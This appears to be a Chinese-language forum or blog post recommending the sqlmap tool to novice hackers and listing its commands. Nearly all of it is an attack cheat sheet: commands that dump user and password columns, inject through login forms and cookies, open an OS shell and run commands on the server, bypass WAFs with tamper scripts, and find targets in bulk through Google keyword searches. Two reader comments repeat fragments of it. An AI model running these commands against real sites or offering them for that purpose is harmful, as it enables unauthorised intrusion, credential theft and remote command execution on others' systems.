神器SqlMap之简单的注入应
各大论坛都有很多sql注入神器,但现再有的也不好用了如啊D,明小子,御剑,不过御剑还是很不错的。
现在给大家推荐一些大牛经常用的注入神器SQLmap(sql枚举数据库)相信很多小黑客都还不知道或者不了解。
在这我也就不细说他的用处毕竟百度有工具可以在BT5的中文网去下载
现在就说一下他的一些命令用法:
Mysql数据库注入:
sqlmap -u "url" --dbs
sqlmap -u "url" -D 数据库 --tables
sqlmap -u "url" -D 数据库 -T 表段 --columns
sqlmap -u "url" -D 数据库 -T 表段 -C id,user,pass --dump
--------------------------------------------------------------------------
Post登陆框注入:
./sqlmap.py -r *.txt -p tfUPass
sqlmap -u url --forms
sqlmap -u url "tfUName=1(可为任意数)&tfUPass=1(可为任意数)"
--------------------------------------------------------------------------
伪静态注入:
sqlmap -u url/x*.html --dbs
---------------------------------------------------------------------------
交互写shell及命令执行:
cmdshell:
sqlmap -u url --os-shell
指定站点类型.1.asp 2.aspx 3.jsp 4.php(default)
指定站点根目录:盘符/目录/
命令执行:
sqlmap -u url --os-cmd=ipconfig
指定站点类型.1.asp 2.aspx 3.jsp 4.php(default)
指定站点根目录:盘符/目录/
--------------------------------------------------------------------------
Cookie注入:
sqlmap -u "url" --cookie "id=" --table --level 2
sqlmap -u "url" --cookie "id=" --clumns -T 表段 --level 2
sqlmap -u "url" --cookie "id=" --dump -T 表段 -C "user,pass" --level 2
--------------------------------------------------------------------------
请求延时注入:
sqlmap --dbs -u usr/x*.html --delay 1(时间,可随意)
sqlmap --dbs -u usr/x*.html --safe-freq 1(次数,可随意)
--------------------------------------------------------------------------
绕过WAF防火墙:
sqlmap -u url -v 3 --dbs --batch --tamper "space2morehash.py"
1.space2hash.py 2.base64encode.py 3.charencode.py
--------------------------------------------------------------------------
Google批量检测注入:
sqlmap -g 关键词
看不懂没事 百度是你最好的老师。
相关文章
- 2条评论
- 只影绾痞2022-05-31 19:51:13
- /目录/命令执行:sqlmap -u url --os-cmd=ipconfig指定站点类型.1.asp 2.aspx 3.jsp 4.php(default)指定站点根目录:盘符/目录/---------
- 酒奴织谜2022-05-31 21:03:54
- -----------------------------------伪静态注入:sqlmap -u url/x*.html --dbs---------------------------------------------------------------------------交互写